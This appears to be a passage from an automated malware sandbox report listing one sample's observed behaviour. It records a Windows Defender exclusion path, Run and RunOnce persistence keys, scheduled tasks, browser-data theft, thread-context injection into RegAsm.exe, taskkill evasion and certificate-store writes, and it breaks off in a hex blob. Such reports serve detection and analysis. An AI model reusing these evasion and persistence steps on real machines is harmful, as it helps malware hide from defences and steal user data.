N/A N/A C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\ZHewunehywi.exe\"" C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2120 set thread context of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LightCleaner\is-TGLIN.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
File created C:\Program Files (x86)\Common Files\ZHewunehywi.exe.config C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File created C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe.config C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\Common Files\ZHewunehywi.exe C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-L9PSD.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-4MV1A.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-L81PH.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-GM5NG.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab23614